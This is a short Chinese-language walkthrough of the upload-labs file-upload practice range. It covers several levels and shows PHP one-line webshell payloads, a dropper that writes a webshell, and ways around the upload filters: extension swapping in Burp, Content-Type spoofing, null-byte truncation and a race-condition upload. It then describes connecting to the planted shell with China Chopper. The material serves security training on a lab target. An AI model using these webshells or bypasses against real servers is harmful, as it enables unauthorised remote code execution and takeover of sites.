upload-labs上传漏洞靶场--pass1,2,11,12,17
upload-labs上传漏洞靶场
1、pass-1改变文件后缀名
新建一句话木马文件:<?php @eval($_POST['x']);?>,并上传。
发现.php文件上传失败,只能使用图片上传
我们修改.php文件的后缀名为.jpg上传,并使用burp抓包
将.jpg修改成.php后,关闭拦截,发送成功
这时,我们复制图片地址,打开菜刀,新建项目
填写相应信息
成功进入对方电脑
2、pass-2改变content-type
上传.php文件
抓包
修改content-type为image/jpeg
放包后,进入菜刀,新建连接测试
成功!
3、文件截断上传
(1)pass-11直接修改地址
新建PHP文件,将后缀名修改为.php.%00.jpg
上传抓包
Post中修改路径
放包,上传
复制图片地址,菜刀链接成功
(2)Pass12修改编码
按下述内容上传文件
修改地址,使它以.php保存
添加隔断符(图片打错字了)
放包上传,步骤与之前一样,然后菜刀验证
成功!
4、竞争上传pass-17
竞争上传需要在目录下新建一句话木马PHP文件
H2.PHP:<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["cmd"])?>’);?>(运行后,生成一句话木马文件,shell.php)
上传成功,但是因为网页没有对上传的文件做类型处理,无论什么文件都会上传成功,但是根据系统设置,非图片文件会被马上杀掉。
这个时候,我们使用burp抓包,使用测试器反复执行,yiju2.php会被反复上传。
这之后,我们构造已经传入了yiju2.php的情况,在浏览器中进入该地址
http://172.16.16.23/upload-labs/upload/yiju2.php
运行,并在此使用burp抓包,并重复上述测试器的步骤
目的在于执行yiju2.php,生成shell.php文件,这时的shell.php文件为一句话木马。创建木马文件成功。
使用菜刀进行测试